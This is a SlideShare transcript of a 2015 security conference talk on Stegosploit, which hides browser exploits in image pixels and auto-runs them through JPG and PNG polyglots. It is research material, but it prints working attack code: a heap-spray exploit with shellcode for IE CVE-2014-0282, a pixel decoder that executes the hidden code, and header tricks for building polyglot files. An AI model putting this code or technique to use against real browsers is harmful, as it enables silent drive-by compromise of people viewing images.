SlideShare ist ein Scribd-Unternehmen logo

Stegosploit - Hacking With Pictures HITB2015AMS

Saumil Shah
Saumil Shah

"A good exploit is one that is delivered in style". Stegosploit explores the art of creative exploit delivery using only JPG/PNG images. This is my talk at Hack In The Box 2015 Amsterdam, demonstrating how to steganographically encode exploits into JPG and PNG images and automatically trigger them when loaded in a browser.

Software
1 von 51
net-square Stegosploit Hacking with Pictures Saumil Shah Hack in the Box Amsterdam 2015
net-square About Me @therealsaumil saumilshah hacker, trainer, speaker, author, photographer educating, entertaining and exasperating audiences since 1999 Saumil Shah CEO, Net-Square
net-square "A good exploit is one that is delivered with style"
net-square Stegosploit - Motivations I <3 Photography + I <3 Browser Exploits = I <3 (Photography + Browser Exploits)
net-square Hiding In Plain Sight can't stop what you can't see
net-square A bit of History •  Traditional Steganography •  GIFAR concatenation •  PHP/ASP webshells appending/ embedding tags <?php..?> <%..%> •  XSS in EXIF data
net-square Stegosploit is... not a 0-day attack with a cute logo not exploit code hidden in EXIF not a PHP/ASP webshell not a new XSS vector Stegosploit lets you deliver existing BROWSER EXPLOITS using pictures.
net-square "The message does not attract attention to itself as an object of scrutiny" Steganography
net-square Images are INNOCENT...
net-square ...but Exploits are NOT!
net-square Dangerous Content Is ...Dangerous Attack Payload SAFE decoder DANGEROUS Pixel Data
net-square Hacking with pictures, in style! •  Network traffic - ONLY image files. •  Exploit hidden in pixels. – no visible aberration or distortion. •  Image "auto runs" upon load. – decoder code bundled WITH the image. •  Exploit automatically decoded and triggered. •  ...all with 1 image.
net-square Hiding the Exploit Code in the Image Step 1
net-square Hiding an Exploit in an Image •  Simple steganography techniques. •  Encode exploit code bitstream into lesser significant bits of RGB values. •  Spread the pixels around e.g. 4x4 grid.
net-square kevin.jpg Face Painting an Exploit function H5(){this.d=[];this.m=new Array();this.f=new Array()}H5.prototype.flatten=function(){for(var f=0;f<this.d.length;f+ +){var n=this.d[f];if(typeof(n)=='number'){var c=n.toString(16);while(c.length<8){c='0'+c}var l=function(a) {return(parseInt(c.substr(a,2),16))};var g=l(6),h=l(4),k=l(2),m=l(0);this.f.push(g);this.f.push(h);this.f.push(k);this.f.push(m)}if(typeof(n)=='string'){for(var d=0;d<n.length;d++){this.f.push(n.charCodeAt(d))}}}};H5.prototype.fill=function(a){for(var c=0,b=0;c<a.data.length;c++,b ++){if(b>=8192){b=0}a.data[c]=(b<this.f.length)?this.f[b]:255}};H5.prototype.spray=function(d){this.flatten();for(var b=0;b<d;b++){var c=document.createElement('canvas');c.width=131072;c.height=1;var a=c.getContext('2d').createImageData(c.width,c.height);this.fill(a);this.m[b]=a}};H5.prototype.setData=function(a) {this.d=a};var flag=false;var heap=new H5();try{location.href='ms-help:'}catch(e){}function spray(){var a='xfc xe8x89x00x00x00x60x89xe5x31xd2x64x8bx52x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4a x26x31xffx31xc0xacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf0x52x57x8bx52x10x8bx42x3c x01xd0x8bx40x78x85xc0x74x4ax01xd0x50x8bx48x18x8bx58x20x01xd3xe3x3cx49x8bx34x8b x01xd6x31xffx31xc0xacxc1xcfx0dx01xc7x38xe0x75xf4x03x7dxf8x3bx7dx24x75xe2x58x8b x58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5a x51xffxe0x58x5fx5ax8bx12xebx86x5dx6ax01x8dx85xb9x00x00x00x50x68x31x8bx6fx87xffxd5xbb xf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xff xd5x63x61x6cx63x2ex65x78x65x00';var c=[];for(var b=0;b<1104;b+=4){c.push(1371756628)} c.push(1371756627);c.push(1371351263);var f=[1371756626,215,2147353344,1371367674,202122408,4294967295,202122400,202122404,64,202116108,2021212 48,16384];var d=c.concat(f);d.push(a);heap.setData(d);heap.spray(256)}function changer(){var c=new Array();for(var a=0;a<100;a++){c.push(document.createElement('img'))}if(flag) {document.getElementById('fm').innerHTML='';CollectGarbage();var b='u2020u0c0c';for(var a=4;a<110;a+=2){b +='u4242'}for(var a=0;a<c.length;a++){c[a].title=b}}}function run() {spray();document.getElementById('c2').checked=true;document.getElementById('c2').onpropertychange=changer;flag= true;document.getElementById('fm').reset()}setTimeout(run,1000); IE Use-After-Free CVE-2014-0282
net-square kevin.jpg Bit layer 7 (MSB) Bit layer 6 Bit layer 5 Bit layer 4 Bit layer 3 Bit layer 2 Bit layer 1 Bit layer 0 (LSB) Image separated into Bit Layers
net-square Encoding data at bit layer 7 Significant visual distortion.
net-square Encoding data at bit layer 2 Negligble visual distortion while encoding at lower layers.
net-square Encoding data at bit layer 2 Encoded pixels visible in certain parts when bit layer 2 is filtered and equalized Final encoded image shows no perceptible visual aberration or distortion.
net-square Encoding on JPG •  JPG – lossy compression. •  Pixels may be approximated to their nearest neighbours. •  Overcoming lossy compression by ITERATIVE ENCODING. •  Can't go too deep down the bit layers. •  IE's JPG encoder is terrible! •  Browser specific JPG quirks.
net-square Encoding on PNG •  Lossless compression. •  Can encode at bit layer 0. – minimum visual distortion. •  Independent of browser library implementation. •  Single pass encoding. •  JPG is still more popular than PNG!
net-square Decoding the encoded Pixel Data Step 2
net-square HTML5 CANVAS is our friend! •  Read image pixel data using JS. •  In-browser decoding of steganographically encoded images.
net-square The Decoder var bL=2,eC=3,gr=3;function i0(){px.onclick=dID}function dID(){var b=document.createElement("canvas");px.parentNode.insertBefore(b,px);b.width =px.width;b.height=px.height;var m=b.getContext("2d");m.drawImage(px, 0,0);px.parentNode.removeChild(px);var f=m.getImageData(0,0,b.width,b.height).data;var h=[],j=0,g=0;var c=function(p,o,u){n=(u*b.width+o)*4;var z=1<<bL;var s=(p[n]&z)>>bL;var q=(p[n+1]&z)>>bL;var a=(p[n+2]&z)>>bL;var t=Math.round((s+q+a)/ 3);switch(eC){case 0:t=s;break;case 1:t=q;break;case 2:t=a;break;} return(String.fromCharCode(t+48))};var k=function(a){for(var q=0,o=0;o<a*8;o++){h[q++]=c(f,j,g);j+=gr;if(j>=b.width){j=0;g +=gr}}};k(6);var d=parseInt(bTS(h.join("")));k(d);try{CollectGarbage()} catch(e){}exc(bTS(h.join("")))}function bTS(b){var a="";for(i=0;i<b.length;i+=8)a+=String.fromCharCode(parseInt(b.substr(i,8), 2));return(a)}function exc(b){var a=setTimeout((new Function(b)),100)} window.onload=i0;
net-square Images that "Auto Run" Step 3
net-square When is an image not an image? When it is Javascript!
net-square IMAJS I SEE PIXELS I SEE CODE
net-square IMAJS – The Concept Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
net-square Cross Container Scripting - XCS <img src="itsatrap.gif"> <script src="itsatrap.gif"> </script>
net-square Image Formats Supported BMP GIF PNG JPG IMAJS Easy Easy Hard (00 in header) Hard (Lossy) Alpha Yes No <CANVAS> ? Yes Yes Colours RGB Paletted RGB RGB Extra Data EXIF
net-square Hat tip: Michael Zalewski @lcamtuf I JPG All new IMAJS-JPG! JPG +HTML +JS +CSS
net-square The Secret Sauce shhh.. don't tell anyone
net-square Be conservative in what you send, be liberal in what you accept. - Jon Postel
net-square JPG Secret Sauce Regular JPEG Header FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 FF E2 ... Start marker length next section... "J F I F 0" Modified JPEG Header FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker length next section... "J F I F 0" whole lot of extra space!
net-square JPG Secret Sauce Modified JPEG Header See the difference? FF D8 FF E0 /* 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 */='';alert(Date());/*...41 41 41 FF E2 ... Start marker comment! next section...Javascript goes here FF D8 FF E0 2F 2A 4A 46 49 46 00 01 01 01 01 2C 01 2C 00 00 41 41 41 41 41...12074..41 41 41 FF E2 ... Start marker length next section... "J F I F 0" whole lot of extra space!
net-square I PNG All new IMAJS-PNG! PNG +HTML +JS +CSS
net-square PNG Secret Sauce - FourCC PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk www.fourcc.org
net-square PNG Secret Sauce - FourCC PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength <html> <!-- CRC tEXtlength _ random chars ... CRC ... random chars ... --> <decoder HTML and script goes here ..> <script type=text/undefined>/*... extra tEXt chunk extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk Inspiration: http://daeken.com/superpacking-js-demos
net-square The Finer Points of Package Delivery Step 4
net-square A Few Browser Tricks... Content Sniffing Expires and Cache-Control Clever CSS
net-square Content Sniffing Credits: Michael Zalewski @lcamtuf
net-square Dive Into Cache GET /stego.jpg HTTP 200 OK Expires: May 30 2015 GET /stego.jpg o hai o hai
net-square IE CInput Use-After-Free stego IMAJS PWN! CVE-2014-0282
net-square Firefox onreadystatechange UAF stego IMAJS PWN! CVE-2013-1690
net-square < PAYLOADS GO back in time
net-square Exploit code encoded in image. EVIL GET /lolcat.png 200 OK Expires: 6 months I'M IN UR BASE Decoder script references image from cache. SAFE GET /lolcat.png Load from cache ....KILLING UR DOODZ FEB 2015 MAY 2015 < ATTACK TIMELINE
net-square Conclusions - Offensive •  Lot of possibilities! •  Weird containers, weird encoding, weird obfuscation. •  Image attacks emerging "in the wild". •  CANVAS + CORS = spread the payloads. •  Not limited to just browsers.
net-square Conclusions - Defensive •  DFIR nightmare. – how far back does your window of inspection go? •  Can't rely on extensions, file headers, MIME types or magic numbers. •  Wake up call to browser-wallahs. •  Quick "fix" – re-encode all images!
net-square FAQs •  Why did you do this? •  Is Chrome safe? Safari? •  Won't an IMAJS file be detected on the wire? (HTML mixed in JPG/PNG data) •  Can I encode Flash exploits? •  Is this XSS? •  Are you releasing the code? PoC||GTFO
net-square Greets! @lcamtuf @angealbertini @0x6D6172696F Kevin McPeake #HITB2015AMS .my, .nl crew! Photographyby Saumil Shah
net-square THE END Saumil Shah @therealsaumil saumilshah saumil@net-square.com Photography flickr.com/saumil www.spectral-lines.in

Empfohlen

Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit Delivery
Saumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015
Saumil Shah
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014
Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
Saumil Shah
 
2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?
Saumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
Saumil Shah
 
W.E.B 2011 - The good, the bad, the ugly
W.E.B 2011 - The good, the bad, the uglyW.E.B 2011 - The good, the bad, the ugly
W.E.B 2011 - The good, the bad, the ugly
Saumil Shah
 

Empfohlen

Innovative Exploit Delivery
Innovative Exploit DeliveryInnovative Exploit Delivery
Innovative Exploit Delivery
Saumil Shah
 
Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015Keep Calm and Stegosploit - 44CON 2015
Keep Calm and Stegosploit - 44CON 2015
Saumil Shah
 
Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014Hacking with Pictures - Hack.LU 2014
Hacking with Pictures - Hack.LU 2014
Saumil Shah
 
Exploit Delivery
Exploit DeliveryExploit Delivery
Exploit Delivery
Saumil Shah
 
Deadly pixels - NSC 2013
Deadly pixels - NSC 2013Deadly pixels - NSC 2013
Deadly pixels - NSC 2013
Saumil Shah
 
2012: The End of the World?
2012: The End of the World?2012: The End of the World?
2012: The End of the World?
Saumil Shah
 
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
12 Years and a Baker's Dozen - Lessons and Learnings from my Infosec Journey
Saumil Shah
 
W.E.B 2011 - The good, the bad, the ugly
W.E.B 2011 - The good, the bad, the uglyW.E.B 2011 - The good, the bad, the ugly
W.E.B 2011 - The good, the bad, the ugly
Saumil Shah
 
Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
Saumil Shah
 
Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015
Saumil Shah
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
Saumil Shah
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
Saumil Shah
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
Saumil Shah
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
Saumil Shah
 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
Saumil Shah
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
Saumil Shah
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, Browsers
Saumil Shah
 
Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San Diego
Saumil Shah
 
Stegosploit - NCSC ONE 2016
Stegosploit - NCSC ONE 2016Stegosploit - NCSC ONE 2016
Stegosploit - NCSC ONE 2016
Saumil Shah
 
Click jacking
Click jackingClick jacking
Click jacking
Ronan Dunne, CEH, SSCP
 
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Shao-Chuan Wang
 
3 channelthermocouplethermometer-131119093245-phpapp02
3 channelthermocouplethermometer-131119093245-phpapp023 channelthermocouplethermometer-131119093245-phpapp02
3 channelthermocouplethermometer-131119093245-phpapp02
Satnam Wadwal
 
Sex, City,Scavengers And I nterpersonnel Skills
Sex, City,Scavengers And I nterpersonnel Skills Sex, City,Scavengers And I nterpersonnel Skills
Sex, City,Scavengers And I nterpersonnel Skills
Rashmi Singh
 
No tlp Polisi
No tlp PolisiNo tlp Polisi
No tlp Polisi
I PUTU ROBBY ANSARY
 
Is she a good student
Is she a good studentIs she a good student
Is she a good student
paku_sol
 
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
Pieter Pauwels
 
Quran in Hindi Part-30
Quran in Hindi Part-30Quran in Hindi Part-30
Quran in Hindi Part-30
Sharaz Ahmed
 
Learning organization may2010
Learning organization may2010Learning organization may2010
Learning organization may2010
Michael Jones
 
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON
 

Weitere ähnliche Inhalte

Andere mochten auch

When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
Saumil Shah
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, Browsers
Saumil Shah
 
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Shao-Chuan Wang
 
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
Pieter Pauwels
 
Learning organization may2010
Learning organization may2010Learning organization may2010
Learning organization may2010
Michael Jones
 

Andere mochten auch (20)

Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015Hacking With Pictures SyScan 2015
Hacking With Pictures SyScan 2015
 
Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015Stegosploit - Hack.LU 2015
Stegosploit - Hack.LU 2015
 
How Functions Work
How Functions WorkHow Functions Work
How Functions Work
 
Operating Systems - A Primer
Operating Systems - A PrimerOperating Systems - A Primer
Operating Systems - A Primer
 
Introduction to Debuggers
Introduction to DebuggersIntroduction to Debuggers
Introduction to Debuggers
 
Hack.LU - The Infosec Crossroads
Hack.LU - The Infosec CrossroadsHack.LU - The Infosec Crossroads
Hack.LU - The Infosec Crossroads
 
When Bad Things Come In Good Packages
When Bad Things Come In Good PackagesWhen Bad Things Come In Good Packages
When Bad Things Come In Good Packages
 
Dive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented ProgrammingDive into ROP - a quick introduction to Return Oriented Programming
Dive into ROP - a quick introduction to Return Oriented Programming
 
W.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, BrowsersW.E.B. 2010 - Web, Exploits, Browsers
W.E.B. 2010 - Web, Exploits, Browsers
 
Web Security: A Journey - UC San Diego
Web Security: A Journey - UC San DiegoWeb Security: A Journey - UC San Diego
Web Security: A Journey - UC San Diego
 
Stegosploit - NCSC ONE 2016
Stegosploit - NCSC ONE 2016Stegosploit - NCSC ONE 2016
Stegosploit - NCSC ONE 2016
 
Click jacking
Click jackingClick jacking
Click jacking
 
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
Beyond The Euclidean Distance: Creating effective visual codebooks using the ...
 
3 channelthermocouplethermometer-131119093245-phpapp02
3 channelthermocouplethermometer-131119093245-phpapp023 channelthermocouplethermometer-131119093245-phpapp02
3 channelthermocouplethermometer-131119093245-phpapp02
 
Sex, City,Scavengers And I nterpersonnel Skills
Sex, City,Scavengers And I nterpersonnel Skills Sex, City,Scavengers And I nterpersonnel Skills
Sex, City,Scavengers And I nterpersonnel Skills
 
No tlp Polisi
No tlp PolisiNo tlp Polisi
No tlp Polisi
 
Is she a good student
Is she a good studentIs she a good student
Is she a good student
 
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
EuropIA 2014 - Analysing the impact of constraints on decision-making by arch...
 
Quran in Hindi Part-30
Quran in Hindi Part-30Quran in Hindi Part-30
Quran in Hindi Part-30
 
Learning organization may2010
Learning organization may2010Learning organization may2010
Learning organization may2010
 

Ähnlich wie Stegosploit - Hacking With Pictures HITB2015AMS

44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and Processes
PrestoCentre
 
Columnar processing for SQL-on-Hadoop: The best is yet to come
Columnar processing for SQL-on-Hadoop: The best is yet to comeColumnar processing for SQL-on-Hadoop: The best is yet to come
Columnar processing for SQL-on-Hadoop: The best is yet to come
Wang Zuo
 
Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...
Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...
Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...
it-people
 
March.2012.KinectForWindows
March.2012.KinectForWindowsMarch.2012.KinectForWindows
March.2012.KinectForWindows
Reuben Ahmed
 

Ähnlich wie Stegosploit - Hacking With Pictures HITB2015AMS (20)

44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
44CON London 2015 - Stegosploit - Drive-by Browser Exploits using only Images
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
 
mmsys2019 live streaming at scale
mmsys2019 live streaming at scalemmsys2019 live streaming at scale
mmsys2019 live streaming at scale
 
Introduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and ProcessesIntroduction to Transcoding: Tools and Processes
Introduction to Transcoding: Tools and Processes
 
Next Stop, Android
Next Stop, AndroidNext Stop, Android
Next Stop, Android
 
VitaFlow | Mageswaran Dhandapani [Pramati]
VitaFlow | Mageswaran Dhandapani [Pramati]VitaFlow | Mageswaran Dhandapani [Pramati]
VitaFlow | Mageswaran Dhandapani [Pramati]
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
HTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwordsHTML5, CSS3, and other fancy buzzwords
HTML5, CSS3, and other fancy buzzwords
 
Country domination - Causing chaos and wrecking havoc
Country domination - Causing chaos and wrecking havocCountry domination - Causing chaos and wrecking havoc
Country domination - Causing chaos and wrecking havoc
 
Triangle Visibility buffer
Triangle Visibility bufferTriangle Visibility buffer
Triangle Visibility buffer
 
Challenges and experiences with IPTV from a network point of view
Challenges and experiences with IPTV from a network point of viewChallenges and experiences with IPTV from a network point of view
Challenges and experiences with IPTV from a network point of view
 
Tech solutions and tricks in real time mobile multiplayer
Tech solutions and tricks in real time mobile multiplayerTech solutions and tricks in real time mobile multiplayer
Tech solutions and tricks in real time mobile multiplayer
 
Feasibility of Security in Micro-Controllers
Feasibility of Security in Micro-ControllersFeasibility of Security in Micro-Controllers
Feasibility of Security in Micro-Controllers
 
Columnar processing for SQL-on-Hadoop: The best is yet to come
Columnar processing for SQL-on-Hadoop: The best is yet to comeColumnar processing for SQL-on-Hadoop: The best is yet to come
Columnar processing for SQL-on-Hadoop: The best is yet to come
 
Performance as UX with Justin Howlett
Performance as UX with Justin HowlettPerformance as UX with Justin Howlett
Performance as UX with Justin Howlett
 
Inside Winnyp
Inside WinnypInside Winnyp
Inside Winnyp
 
Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...
Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...
Jonathan Ellis "Apache Cassandra 2.0 and 2.1". Выступление на Cassandra conf ...
 
March.2012.KinectForWindows
March.2012.KinectForWindowsMarch.2012.KinectForWindows
March.2012.KinectForWindows
 
Trivadis TechEvent 2017 Querying distributed data with SQL and Apache Drill b...
Trivadis TechEvent 2017 Querying distributed data with SQL and Apache Drill b...Trivadis TechEvent 2017 Querying distributed data with SQL and Apache Drill b...
Trivadis TechEvent 2017 Querying distributed data with SQL and Apache Drill b...
 
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
 

Mehr von Saumil Shah

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
Saumil Shah
 

Mehr von Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
Schrödinger's ARM Assembly
Schrödinger's ARM AssemblySchrödinger's ARM Assembly
Schrödinger's ARM Assembly
 
ARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMSARM Polyglot Shellcode - HITB2019AMS
ARM Polyglot Shellcode - HITB2019AMS
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Make ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEKMake ARM Shellcode Great Again - HITB2018PEK
Make ARM Shellcode Great Again - HITB2018PEK
 

Kürzlich hochgeladen

Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) SolutionIntroducing Microsoft’s new Enterprise Work Management (EWM) Solution
Introducing Microsoft’s new Enterprise Work Management (EWM) Solution
OnePlan Solutions
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
Delhi Call girls
 
introduction-to-automotive Andoid os-csimmonds-ndctechtown-2021.pdf
